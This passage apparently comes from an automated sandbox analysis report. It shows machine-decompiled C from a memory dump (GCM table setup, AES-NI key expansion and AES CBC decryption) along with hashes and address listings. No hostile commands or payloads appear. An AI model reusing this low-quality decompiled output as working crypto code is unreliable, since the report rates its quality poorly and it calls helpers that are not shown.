                                                              				signed int _t273;
                                                              				signed int _t275;
                                                              				signed int _t277;
                                                              				signed int _t279;
                                                              				signed int _t285;
                                                              				signed int _t287;
                                                              				signed int _t289;
                                                              				signed int _t293;
                                                              				signed int _t298;
                                                              				signed int _t301;
                                                              				signed int _t302;
                                                              
                                                              				E00C6BB10(0x40);
                                                              				_t178 = _a68;
                                                              				 *_t178 = 0;
                                                              				 *((intOrPtr*)(_t178 + 4)) = 0;
                                                              				 *((intOrPtr*)(_t178 + 8)) = 0;
                                                              				 *((intOrPtr*)(_t178 + 0xc)) = 0;
                                                              				_t208 =  *__edx;
                                                              				_t179 = __edx[3];
                                                              				_t293 = __edx[2];
                                                              				_t267 = __edx[1];
                                                              				 *(_t178 + 0x80) = _t208;
                                                              				 *(_t178 + 0x84) = _t267;
                                                              				 *(_t178 + 0x88) = _t293;
                                                              				_a48 = _t208;
                                                              				_t250 = (_t179 << 0x00000020 | _t293) >> 1;
                                                              				 *(_t178 + 0x8c) = _t179;
                                                              				_t210 = _t208 << 0x0000001f | _t179 >> 0x00000001;
                                                              				_t182 = 0 ^ (_t267 << 0x00000020 | _a48) >> 0x1;
                                                              				_t231 =  ~(_t293 & 0x00000001) & 0xe1000000 ^ _t267 >> 0x00000001;
                                                              				 *(_t178 + 0x40) = _t182;
                                                              				 *(_t178 + 0x44) = _t231;
                                                              				_a52 = _t231;
                                                              				 *(_t178 + 0x48) = _t250;
                                                              				 *(_t178 + 0x4c) = _t210;
                                                              				_t234 = _t182 << 0x0000001f | _t210 >> 0x00000001;
                                                              				_t212 = _a52;
                                                              				_t298 = (_t210 << 0x00000020 | _t250) >> 1;
                                                              				_t253 = 0 ^ (_t212 << 0x00000020 | _t182) >> 0x1;
                                                              				_t273 =  ~(_t250 & 0x00000001) & 0xe1000000 ^ _t212 >> 0x00000001;
                                                              				 *(_t178 + 0x20) = _t253;
                                                              				 *(_t178 + 0x24) = _t273;
                                                              				 *(_t178 + 0x28) = _t298;
                                                              				_a4 = _t253;
                                                              				_a4 = _a4 << 0x1f;
                                                              				_v0 = 0;
                                                              				_t301 = _v0 | (_t234 << 0x00000020 | _t298) >> 0x1;
                                                              				 *(_t178 + 0x2c) = _t234;
                                                              				_t186 = _a4 | _t234 >> 0x00000001;
                                                              				_a60 = _t186;
                                                              				_t218 =  ~(_t298 & 0x00000001) & 0xe1000000 ^ _t273 >> 0x00000001;
                                                              				_t275 =  *(_t178 + 0x24);
                                                              				_t237 = 0 ^ (_t273 << 0x00000020 | _t253) >> 0x1;
                                                              				 *(_t178 + 0x10) = _t237;
                                                              				 *(_t178 + 0x14) = _t218;
                                                              				 *(_t178 + 0x18) = _t301;
                                                              				_a44 = _t275;
                                                              				_t219 =  *(_t178 + 0x28);
                                                              				 *(_t178 + 0x1c) = _t186;
                                                              				_t187 =  *(_t178 + 0x20);
                                                              				 *(_t178 + 0x34) = _t275 ^ _t218;
                                                              				_t277 =  *(_t178 + 0x14);
                                                              				_a52 = _t277;
                                                              				_t238 =  *(_t178 + 0x2c);
                                                              				_a4 = _t238;
                                                              				_v0 = _t219;
                                                              				 *(_t178 + 0x3c) = _t238 ^ _a60;
                                                              				_t241 =  *(_t178 + 0x18);
                                                              				 *(_t178 + 0x54) = _t277 ^  *(_t178 + 0x44);
                                                              				_t279 =  *(_t178 + 0x1c);
                                                              				_a20 = _t279;
                                                              				_t302 =  *(_t178 + 0x10);
                                                              				 *(_t178 + 0x5c) = _t279 ^  *(_t178 + 0x4c);
                                                              				 *(_t178 + 0x30) = _t187 ^ _t237;
                                                              				 *(_t178 + 0x64) = _a44 ^  *(_t178 + 0x44);
                                                              				_a16 = _t241;
                                                              				 *(_t178 + 0x68) = _v0 ^  *(_t178 + 0x48);
                                                              				_t285 =  *(_t178 + 0x30);
                                                              				 *(_t178 + 0x38) = _t219 ^ _t301;
                                                              				_t221 =  *(_t178 + 0x40);
                                                              				 *(_t178 + 0x58) = _t241 ^  *(_t178 + 0x48);
                                                              				_a24 = _t285;
                                                              				_t222 =  *(_t178 + 0x38);
                                                              				 *(_t178 + 0x50) = _t302 ^ _t221;
                                                              				_a32 = _t222;
                                                              				 *(_t178 + 0x60) = _t187 ^ _t221;
                                                              				_t245 =  *(_t178 + 0x4c);
                                                              				 *(_t178 + 0x70) = _t285 ^ _t221;
                                                              				_t287 =  *(_t178 + 0x3c);
                                                              				 *(_t178 + 0x78) = _t222 ^  *(_t178 + 0x48);
                                                              				_t224 =  *(_t178 + 0x80);
                                                              				 *(_t178 + 0x6c) = _a4 ^ _t245;
                                                              				_t261 =  *(_t178 + 0x34);
                                                              				_a8 = _t302 ^ _t224;
                                                              				_a36 = _t287;
                                                              				_t246 =  *(_t178 + 0x84);
                                                              				_a28 = _t261;
                                                              				_a12 = _a52 ^ _t246;
                                                              				 *(_t178 + 0x74) = _t261 ^  *(_t178 + 0x44);
                                                              				_t263 =  *(_t178 + 0x8c);
                                                              				 *(_t178 + 0x7c) = _t287 ^ _t245;
                                                              				_t289 =  *(_t178 + 0x88);
                                                              				 *((intOrPtr*)(_t178 + 0x90)) = _a8;
                                                              				 *((intOrPtr*)(_t178 + 0x94)) = _a12;
                                                              				_a8 = _a16 ^ _t289;
                                                              				_a12 = _a20 ^ _t263;
                                                              				 *(_t178 + 0x98) = _a8;
                                                              				 *(_t178 + 0x9c) = _a12;
                                                              				 *(_t178 + 0xa4) = _a44 ^ _t246;
                                                              				 *(_t178 + 0xa0) = _t187 ^ _t224;
                                                              				 *(_t178 + 0xac) = _a4 ^ _t263;
                                                              				 *(_t178 + 0xa8) = _v0 ^ _t289;
                                                              				 *(_t178 + 0xb4) = _a28 ^ _t246;
                                                              				 *(_t178 + 0xb0) = _a24 ^ _t224;
                                                              				 *(_t178 + 0xbc) = _a36 ^ _t263;
                                                              				 *(_t178 + 0xb8) = _a32 ^ _t289;
                                                              				 *(_t178 + 0xc0) = _t224 ^  *(_t178 + 0x40);
                                                              				 *(_t178 + 0xc4) = _t246 ^  *(_t178 + 0x44);
                                                              				 *(_t178 + 0xcc) =  *(_t178 + 0x4c) ^ _t263;
                                                              				 *(_t178 + 0xc8) =  *(_t178 + 0x48) ^ _t289;
                                                              				 *(_t178 + 0xd4) =  *(_t178 + 0x54) ^ _t246;
                                                              				 *(_t178 + 0xd0) =  *(_t178 + 0x50) ^ _t224;
                                                              				 *(_t178 + 0xd8) = _t289 ^  *(_t178 + 0x58);
                                                              				 *(_t178 + 0xdc) = _t263 ^  *(_t178 + 0x5c);
                                                              				 *(_t178 + 0xe4) =  *(_t178 + 0x64) ^ _t246;
                                                              				 *(_t178 + 0xe0) =  *(_t178 + 0x60) ^ _t224;
                                                              				 *(_t178 + 0xf8) = _t289 ^  *(_t178 + 0x78);
                                                              				 *(_t178 + 0xfc) = _t263 ^  *(_t178 + 0x7c);
                                                              				 *(_t178 + 0xec) = _t263 ^  *(_t178 + 0x6c);
                                                              				 *(_t178 + 0xe8) = _t289 ^  *(_t178 + 0x68);
                                                              				 *(_t178 + 0xf0) = _t224 ^  *(_t178 + 0x70);
                                                              				 *(_t178 + 0xf4) = _t246 ^  *(_t178 + 0x74);
                                                              				return _t178;
                                                              			}

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aff455658b15347d0a7bdb51ddfb3d96cae611f9a7466f77bf82a1d0a841161e
                                                              • Instruction ID: 614e5ad5a990903edb75d352e57684b2918de6cb4291b5811c77c91aaccbac7f
                                                              • Opcode Fuzzy Hash: aff455658b15347d0a7bdb51ddfb3d96cae611f9a7466f77bf82a1d0a841161e
                                                              • Instruction Fuzzy Hash: E1C1D5B19143188FD344DF5AC184A56BBE1BF8C710F4685FEEA589B322DB70A940CF95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 15%
                                                              			E00B9B2D7(void* __ecx, void* __edx) {
                                                              				void* _t14;
                                                              				void* _t16;
                                                              				void* _t17;
                                                              				void* _t18;
                                                              				void* _t19;
                                                              				void* _t20;
                                                              				void* _t21;
                                                              				void* _t22;
                                                              				void* _t23;
                                                              				void* _t24;
                                                              				void* _t25;
                                                              				void* _t26;
                                                              				void* _t27;
                                                              				void* _t30;
                                                              				void* _t31;
                                                              				void* _t32;
                                                              				void* _t33;
                                                              				void* _t34;
                                                              				void* _t35;
                                                              				void* _t36;
                                                              				void* _t39;
                                                              				void* _t40;
                                                              				void* _t41;
                                                              				void* _t42;
                                                              				void* _t43;
                                                              				void* _t44;
                                                              				void* _t45;
                                                              				void* _t46;
                                                              				void* _t47;
                                                              				void* _t54;
                                                              				void* _t57;
                                                              				void* _t60;
                                                              				void* _t63;
                                                              				void* _t64;
                                                              				void* _t65;
                                                              				signed int _t68;
                                                              
                                                              				_t63 = __edx;
                                                              				asm("movups xmm0, [eax]");
                                                              				asm("xorps xmm4, xmm4");
                                                              				_t3 = _t63 + 0x10; // 0x87c70c75
                                                              				_t64 = _t3;
                                                              				_t68 =  *0x00ECC794 & 0x10000800;
                                                              				if(__ecx == 0x100) {
                                                              					asm("movups xmm2, [eax+0x10]");
                                                              					_t65 = _t64 + 0x10;
                                                              					if(_t68 == 0x10000000) {
                                                              						asm("movdqa xmm5, [ebx]");
                                                              						asm("movdqa xmm4, [ebx+0x20]");
                                                              						_t54 = 7;
                                                              						asm("movdqu [edx-0x20], xmm0");
                                                              						asm("movdqa xmm1, xmm2");
                                                              						asm("movdqu [edx-0x10], xmm2");
                                                              						while(1) {
                                                              							asm("pshufb xmm2, xmm5");
                                                              							asm("aesenclast xmm2, xmm4");
                                                              							asm("movdqa xmm3, xmm0");
                                                              							asm("pslldq xmm0, 0x4");
                                                              							asm("pxor xmm3, xmm0");
                                                              							asm("pslldq xmm0, 0x4");
                                                              							asm("pxor xmm3, xmm0");
                                                              							asm("pslldq xmm0, 0x4");
                                                              							asm("pxor xmm0, xmm3");
                                                              							asm("pslld xmm4, 0x1");
                                                              							asm("pxor xmm0, xmm2");
                                                              							asm("movdqu [edx], xmm0");
                                                              							_t54 = _t54 - 1;
                                                              							if(_t54 == 0) {
                                                              								break;
                                                              							}
                                                              							asm("pshufd xmm2, xmm0, 0xff");
                                                              							asm("pxor xmm3, xmm3");
                                                              							asm("aesenclast xmm2, xmm3");
                                                              							asm("movdqa xmm3, xmm1");
                                                              							asm("pslldq xmm1, 0x4");
                                                              							asm("pxor xmm3, xmm1");
                                                              							asm("pslldq xmm1, 0x4");
                                                              							asm("pxor xmm3, xmm1");
                                                              							asm("pslldq xmm1, 0x4");
                                                              							asm("pxor xmm1, xmm3");
                                                              							asm("pxor xmm2, xmm1");
                                                              							asm("movdqu [edx+0x10], xmm2");
                                                              							_t12 = _t65 + 0x20; // 0xc24548b
                                                              							_t65 = _t12;
                                                              							asm("movdqa xmm1, xmm2");
                                                              						}
                                                              						 *((intOrPtr*)(_t65 + 0x10)) = 0xd;
                                                              					} else {
                                                              						asm("movups [edx-0x20], xmm0");
                                                              						asm("movups [edx-0x10], xmm2");
                                                              						asm("aeskeygenassist xmm1, xmm2, 0x1");
                                                              						_t16 = E00B9B6E6(_t14);
                                                              						asm("aeskeygenassist xmm1, xmm0, 0x1");
                                                              						_t17 = E00B9B700(_t16, _t65);
                                                              						asm("aeskeygenassist xmm1, xmm2, 0x2");
                                                              						_t18 = E00B9B6E0(_t17, _t65);
                                                              						asm("aeskeygenassist xmm1, xmm0, 0x2");
                                                              						_t19 = E00B9B700(_t18, _t65);
                                                              						asm("aeskeygenassist xmm1, xmm2, 0x4");
                                                              						_t20 = E00B9B6E0(_t19, _t65);
                                                              						asm("aeskeygenassist xmm1, xmm0, 0x4");
                                                              						_t21 = E00B9B700(_t20, _t65);
                                                              						asm("aeskeygenassist xmm1, xmm2, 0x8");
                                                              						_t22 = E00B9B6E0(_t21, _t65);
                                                              						asm("aeskeygenassist xmm1, xmm0, 0x8");
                                                              						_t23 = E00B9B700(_t22, _t65);
                                                              						asm("aeskeygenassist xmm1, xmm2, 0x10");
                                                              						_t24 = E00B9B6E0(_t23, _t65);
                                                              						asm("aeskeygenassist xmm1, xmm0, 0x10");
                                                              						_t25 = E00B9B700(_t24, _t65);
                                                              						asm("aeskeygenassist xmm1, xmm2, 0x20");
                                                              						_t26 = E00B9B6E0(_t25, _t65);
                                                              						asm("aeskeygenassist xmm1, xmm0, 0x20");
                                                              						_t27 = E00B9B700(_t26, _t65);
                                                              						asm("aeskeygenassist xmm1, xmm2, 0x40");
                                                              						E00B9B6E0(_t27, _t65);
                                                              						asm("movups [edx], xmm0");
                                                              						 *((intOrPtr*)(_t65 + 0x10)) = 0xd;
                                                              					}
                                                              					goto L19;
                                                              				} else {
                                                              					if(__ecx == 0xc0) {
                                                              						asm("movq xmm2, [eax+0x10]");
                                                              						if(_t68 == 0x10000000) {
                                                              							asm("movdqa xmm5, [ebx+0x10]");
                                                              							asm("movdqa xmm4, [ebx+0x20]");
                                                              							_t57 = 8;
                                                              							asm("movdqu [edx-0x10], xmm0");
                                                              							do {
                                                              								asm("movq [edx], xmm2");
                                                              								asm("movdqa xmm1, xmm2");
                                                              								asm("pshufb xmm2, xmm5");
                                                              								asm("aesenclast xmm2, xmm4");
                                                              								asm("pslld xmm4, 0x1");
                                                              								_t64 = _t64 + 0x18;
                                                              								asm("movdqa xmm3, xmm0");
                                                              								asm("pslldq xmm0, 0x4");
                                                              								asm("pxor xmm3, xmm0");
                                                              								asm("pslldq xmm0, 0x4");
                                                              								asm("pxor xmm3, xmm0");
                                                              								asm("pslldq xmm0, 0x4");
                                                              								asm("pxor xmm0, xmm3");
                                                              								asm("pshufd xmm3, xmm0, 0xff");
                                                              								asm("pxor xmm3, xmm1");
                                                              								asm("pslldq xmm1, 0x4");
                                                              								asm("pxor xmm3, xmm1");
                                                              								asm("pxor xmm0, xmm2");
                                                              								asm("pxor xmm2, xmm3");
                                                              								asm("movdqu [edx-0x10], xmm0");
                                                              								_t57 = _t57 - 1;
                                                              							} while (_t57 != 0);
                                                              							 *((intOrPtr*)(_t64 + 0x20)) = 0xb;
                                                              						} else {
                                                              							asm("movups [edx-0x10], xmm0");
                                                              							asm("aeskeygenassist xmm1, xmm2, 0x1");
                                                              							_t30 = E00B9B540(_t14);
                                                              							asm("aeskeygenassist xmm1, xmm2, 0x2");
                                                              							_t31 = E00B9B580(_t30, _t64);
                                                              							asm("aeskeygenassist xmm1, xmm2, 0x4");
                                                              							_t32 = E00B9B530(_t31, _t64);
                                                              							asm("aeskeygenassist xmm1, xmm2, 0x8");
                                                              							_t33 = E00B9B580(_t32, _t64);
                                                              							asm("aeskeygenassist xmm1, xmm2, 0x10");
                                                              							_t34 = E00B9B530(_t33, _t64);
                                                              							asm("aeskeygenassist xmm1, xmm2, 0x20");
                                                              							_t35 = E00B9B580(_t34, _t64);
                                                              							asm("aeskeygenassist xmm1, xmm2, 0x40");
                                                              							_t36 = E00B9B530(_t35, _t64);
                                                              							asm("aeskeygenassist xmm1, xmm2, 0x80");
                                                              							E00B9B580(_t36, _t64);
                                                              							asm("movups [edx], xmm0");
                                                              							 *((intOrPtr*)(_t64 + 0x30)) = 0xb;
                                                              						}
                                                              						goto L19;
                                                              					} else {
                                                              						if(__ecx != 0x80) {
                                                              							asm("pxor xmm0, xmm0");
                                                              							return 0xfffffffe;
                                                              						} else {
                                                              							if(_t68 == 0x10000000) {
                                                              								asm("movdqa xmm5, [ebx]");
                                                              								_t60 = 8;
                                                              								asm("movdqa xmm4, [ebx+0x20]");
                                                              								asm("movdqa xmm2, xmm0");
                                                              								asm("movdqu [edx-0x10], xmm0");
                                                              								do {
                                                              									asm("pshufb xmm0, xmm5");
                                                              									asm("aesenclast xmm0, xmm4");
                                                              									asm("pslld xmm4, 0x1");
                                                              									_t64 = _t64 + 0x10;
                                                              									asm("movdqa xmm3, xmm2");
                                                              									asm("pslldq xmm2, 0x4");
                                                              									asm("pxor xmm3, xmm2");
                                                              									asm("pslldq xmm2, 0x4");
                                                              									asm("pxor xmm3, xmm2");
                                                              									asm("pslldq xmm2, 0x4");
                                                              									asm("pxor xmm2, xmm3");
                                                              									asm("pxor xmm0, xmm2");
                                                              									asm("movdqu [edx-0x10], xmm0");
                                                              									asm("movdqa xmm2, xmm0");
                                                              									_t60 = _t60 - 1;
                                                              								} while (_t60 != 0);
                                                              								asm("movdqa xmm4, [ebx+0x30]");
                                                              								asm("pshufb xmm0, xmm5");
                                                              								asm("aesenclast xmm0, xmm4");
                                                              								asm("pslld xmm4, 0x1");
                                                              								asm("movdqa xmm3, xmm2");
                                                              								asm("pslldq xmm2, 0x4");
                                                              								asm("pxor xmm3, xmm2");
                                                              								asm("pslldq xmm2, 0x4");
                                                              								asm("pxor xmm3, xmm2");
                                                              								asm("pslldq xmm2, 0x4");
                                                              								asm("pxor xmm2, xmm3");
                                                              								asm("pxor xmm0, xmm2");
                                                              								asm("movdqu [edx], xmm0");
                                                              								asm("movdqa xmm2, xmm0");
                                                              								asm("pshufb xmm0, xmm5");
                                                              								asm("aesenclast xmm0, xmm4");
                                                              								asm("movdqa xmm3, xmm2");
                                                              								asm("pslldq xmm2, 0x4");
                                                              								asm("pxor xmm3, xmm2");
                                                              								asm("pslldq xmm2, 0x4");
                                                              								asm("pxor xmm3, xmm2");
                                                              								asm("pslldq xmm2, 0x4");
                                                              								asm("pxor xmm2, xmm3");
                                                              								asm("pxor xmm0, xmm2");
                                                              								asm("movdqu [edx+0x10], xmm0");
                                                              								 *((intOrPtr*)(_t64 + 0x60)) = 9;
                                                              							} else {
                                                              								asm("movups [edx-0x10], xmm0");
                                                              								asm("aeskeygenassist xmm1, xmm0, 0x1");
                                                              								_t39 = E00B9B3B6(_t14);
                                                              								asm("aeskeygenassist xmm1, xmm0, 0x2");
                                                              								_t40 = E00B9B3B0(_t39, _t64);
                                                              								asm("aeskeygenassist xmm1, xmm0, 0x4");
                                                              								_t41 = E00B9B3B0(_t40, _t64);
                                                              								asm("aeskeygenassist xmm1, xmm0, 0x8");
                                                              								_t42 = E00B9B3B0(_t41, _t64);
                                                              								asm("aeskeygenassist xmm1, xmm0, 0x10");
                                                              								_t43 = E00B9B3B0(_t42, _t64);
                                                              								asm("aeskeygenassist xmm1, xmm0, 0x20");
                                                              								_t44 = E00B9B3B0(_t43, _t64);
                                                              								asm("aeskeygenassist xmm1, xmm0, 0x40");
                                                              								_t45 = E00B9B3B0(_t44, _t64);
                                                              								asm("aeskeygenassist xmm1, xmm0, 0x80");
                                                              								_t46 = E00B9B3B0(_t45, _t64);
                                                              								asm("aeskeygenassist xmm1, xmm0, 0x1b");
                                                              								_t47 = E00B9B3B0(_t46, _t64);
                                                              								asm("aeskeygenassist xmm1, xmm0, 0x36");
                                                              								E00B9B3B0(_t47, _t64);
                                                              								asm("movups [edx], xmm0");
                                                              								 *((intOrPtr*)(_t64 + 0x50)) = 9;
                                                              							}
                                                              							L19:
                                                              							asm("pxor xmm0, xmm0");
                                                              							asm("pxor xmm1, xmm1");
                                                              							asm("pxor xmm2, xmm2");
                                                              							asm("pxor xmm3, xmm3");
                                                              							asm("pxor xmm4, xmm4");
                                                              							asm("pxor xmm5, xmm5");
                                                              							return 0;
                                                              						}
                                                              					}
                                                              				}
                                                              			}







































                                                              0x00b9b6b4
                                                              0x00b9b6b9
                                                              0x00b9b6bf
                                                              0x00b9b6c4
                                                              0x00b9b6ca
                                                              0x00b9b6cf
                                                              0x00b9b6d2
                                                              0x00b9b6d5
                                                              0x00000000
                                                              0x00b9b302
                                                              0x00b9b308
                                                              0x00b9b4b0
                                                              0x00b9b4bb
                                                              0x00b9b5a0
                                                              0x00b9b5a5
                                                              0x00b9b5aa
                                                              0x00b9b5af
                                                              0x00b9b5b4
                                                              0x00b9b5b4
                                                              0x00b9b5b8
                                                              0x00b9b5bc
                                                              0x00b9b5c1
                                                              0x00b9b5c6
                                                              0x00b9b5cb
                                                              0x00b9b5ce
                                                              0x00b9b5d2
                                                              0x00b9b5d7
                                                              0x00b9b5db
                                                              0x00b9b5e0
                                                              0x00b9b5e4
                                                              0x00b9b5e9
                                                              0x00b9b5ed
                                                              0x00b9b5f2
                                                              0x00b9b5f6
                                                              0x00b9b5fb
                                                              0x00b9b5ff
                                                              0x00b9b603
                                                              0x00b9b607
                                                              0x00b9b60c
                                                              0x00b9b60c
                                                              0x00b9b618
                                                              0x00b9b4c1
                                                              0x00b9b4c6
                                                              0x00b9b4ca
                                                              0x00b9b4d0
                                                              0x00b9b4d5
                                                              0x00b9b4db
                                                              0x00b9b4e0
                                                              0x00b9b4e6
                                                              0x00b9b4eb
                                                              0x00b9b4f1
                                                              0x00b9b4f6
                                                              0x00b9b4fc
                                                              0x00b9b501
                                                              0x00b9b507
                                                              0x00b9b50c
                                                              0x00b9b512
                                                              0x00b9b517
                                                              0x00b9b51d
                                                              0x00b9b522
                                                              0x00b9b525
                                                              0x00b9b525
                                                              0x00000000
                                                              0x00b9b30e
                                                              0x00b9b314
                                                              0x00b9b7e8
                                                              0x00b9b7f3
                                                              0x00b9b320
                                                              0x00b9b326
                                                              0x00b9b3d0
                                                              0x00b9b3d4
                                                              0x00b9b3d9
                                                              0x00b9b3de
                                                              0x00b9b3e2
                                                              0x00b9b3e7
                                                              0x00b9b3e7
                                                              0x00b9b3ec
                                                              0x00b9b3f1
                                                              0x00b9b3f6
                                                              0x00b9b3f9
                                                              0x00b9b3fd
                                                              0x00b9b402
                                                              0x00b9b406
                                                              0x00b9b40b
                                                              0x00b9b40f
                                                              0x00b9b414
                                                              0x00b9b418
                                                              0x00b9b41c
                                                              0x00b9b421
                                                              0x00b9b425
                                                              0x00b9b425
                                                              0x00b9b42c
                                                              0x00b9b431
                                                              0x00b9b436
                                                              0x00b9b43b
                                                              0x00b9b440
                                                              0x00b9b444
                                                              0x00b9b449
                                                              0x00b9b44d
                                                              0x00b9b452
                                                              0x00b9b456
                                                              0x00b9b45b
                                                              0x00b9b45f
                                                              0x00b9b463
                                                              0x00b9b467
                                                              0x00b9b46b
                                                              0x00b9b470
                                                              0x00b9b475
                                                              0x00b9b479
                                                              0x00b9b47e
                                                              0x00b9b482
                                                              0x00b9b487
                                                              0x00b9b48b
                                                              0x00b9b490
                                                              0x00b9b494
                                                              0x00b9b498
                                                              0x00b9b4a2
                                                              0x00b9b32c
                                                              0x00b9b331
                                                              0x00b9b335
                                                              0x00b9b33b
                                                              0x00b9b340
                                                              0x00b9b346
                                                              0x00b9b34b
                                                              0x00b9b351
                                                              0x00b9b356
                                                              0x00b9b35c
                                                              0x00b9b361
                                                              0x00b9b367
                                                              0x00b9b36c
                                                              0x00b9b372
                                                              0x00b9b377
                                                              0x00b9b37d
                                                              0x00b9b382
                                                              0x00b9b388
                                                              0x00b9b38d
                                                              0x00b9b393
                                                              0x00b9b398
                                                              0x00b9b39e
                                                              0x00b9b3a3
                                                              0x00b9b3a6
                                                              0x00b9b3a6
                                                              0x00b9b7c3
                                                              0x00b9b7c3
                                                              0x00b9b7c7
                                                              0x00b9b7cb
                                                              0x00b9b7cf
                                                              0x00b9b7d3
                                                              0x00b9b7d7
                                                              0x00b9b7df
                                                              0x00b9b7df
                                                              0x00b9b314
                                                              0x00b9b308

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 18486c4e979394316ed11698c54234db91c0dea15fde20e6480289eb3a4aa722
                                                              • Instruction ID: 96a48465d7be607e89c96c8de6bd858a09f41542636ca3e5b33aa5020f826791
                                                              • Opcode Fuzzy Hash: 18486c4e979394316ed11698c54234db91c0dea15fde20e6480289eb3a4aa722
                                                              • Instruction Fuzzy Hash: 02A1E021C09F9946FB077B755153660E330AFF3244F10CBA7FDA178967EB61B6885220
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 28%
                                                              			E00B9AF30(void* _a4, void* _a8, int _a12, intOrPtr _a16, void* _a20, intOrPtr _a24) {
                                                              				intOrPtr _v0;
                                                              				int _t28;
                                                              				signed int _t29;
                                                              				void* _t30;
                                                              				void* _t31;
                                                              				void* _t32;
                                                              				void* _t33;
                                                              				void* _t34;
                                                              				void* _t35;
                                                              				void* _t36;
                                                              				void* _t37;
                                                              				void* _t39;
                                                              				void* _t42;
                                                              				intOrPtr _t44;
                                                              				intOrPtr _t45;
                                                              				int _t49;
                                                              				intOrPtr _t54;
                                                              				void* _t55;
                                                              				void* _t56;
                                                              				void* _t57;
                                                              				void* _t61;
                                                              				void* _t63;
                                                              				intOrPtr _t66;
                                                              				intOrPtr _t68;
                                                              				void* _t69;
                                                              
                                                              				_t63 = _a4;
                                                              				_t57 = _a8;
                                                              				_t28 = _a12;
                                                              				_t42 = _t68 - 0x00000018 & 0xfffffff0;
                                                              				_t54 = _a16;
                                                              				if(_t28 == 0) {
                                                              					return _t28;
                                                              				}
                                                              				_t69 = _t42;
                                                              				asm("movups xmm7, [ebp]");
                                                              				_t45 =  *((intOrPtr*)(_t54 + 0xf0));
                                                              				_t66 = _t54;
                                                              				_v0 = _t68;
                                                              				_t44 = _t45;
                                                              				if(_a24 == 0) {
                                                              					if(_t28 <= 0x50) {
                                                              						L16:
                                                              						asm("movups xmm2, [esi]");
                                                              						asm("movaps xmm6, xmm2");
                                                              						if(_t28 <= 0x10) {
                                                              							asm("movups xmm0, [edx]");
                                                              							asm("movups xmm1, [edx+0x10]");
                                                              							_t55 = _t54 + 0x20;
                                                              							asm("xorps xmm2, xmm0");
                                                              							do {
                                                              								asm("aesdec xmm2, xmm1");
                                                              								_t45 = _t45 - 1;
                                                              								asm("movups xmm1, [edx]");
                                                              								_t22 = _t55 + 0x10; // 0xcccccccc
                                                              								_t55 = _t22;
                                                              							} while (_t45 != 0);
                                                              							asm("aesdeclast xmm2, xmm1");
                                                              							asm("xorps xmm2, xmm7");
                                                              							asm("movaps xmm7, xmm6");
                                                              							_t29 = _t28 - 0x10;
                                                              							goto L28;
                                                              						}
                                                              						asm("movups xmm3, [esi+0x10]");
                                                              						asm("movaps xmm5, xmm3");
                                                              						if(_t28 <= 0x20) {
                                                              							_t31 = E00B98880(_t28, _t45, _t54);
                                                              							asm("xorps xmm2, xmm7");
                                                              							asm("xorps xmm3, xmm6");
                                                              							asm("movups [edi], xmm2");
                                                              							asm("movaps xmm2, xmm3");
                                                              							asm("pxor xmm3, xmm3");
                                                              							_t57 = _t57 + 0x10;
                                                              							asm("movaps xmm7, xmm5");
                                                              							_t29 = _t31 - 0x20;
                                                              						} else {
                                                              							asm("movups xmm4, [esi+0x20]");
                                                              							if(_t28 <= 0x30) {
                                                              								_t32 = E00B98960(_t28, _t45, _t54);
                                                              								asm("xorps xmm2, xmm7");
                                                              								asm("xorps xmm3, xmm6");
                                                              								asm("xorps xmm4, xmm5");
                                                              								asm("movups [edi], xmm2");
                                                              								asm("movaps xmm2, xmm4");
                                                              								asm("pxor xmm4, xmm4");
                                                              								asm("movups [edi+0x10], xmm3");
                                                              								asm("pxor xmm3, xmm3");
                                                              								_t57 = _t57 + 0x20;
                                                              								asm("movups xmm7, [esi+0x20]");
                                                              								_t29 = _t32 - 0x30;
                                                              							} else {
                                                              								asm("movups xmm5, [esi+0x30]");
                                                              								if(_t28 <= 0x40) {
                                                              									_t33 = E00B98A70(_t28, _t45, _t54);
                                                              									asm("movups xmm1, [esi+0x10]");
                                                              									asm("movups xmm0, [esi+0x20]");
                                                              									asm("xorps xmm2, xmm7");
                                                              									asm("movups xmm7, [esi+0x30]");
                                                              									asm("xorps xmm3, xmm6");
                                                              									asm("movups [edi], xmm2");
                                                              									asm("xorps xmm4, xmm1");
                                                              									asm("movups [edi+0x10], xmm3");
                                                              									asm("pxor xmm3, xmm3");
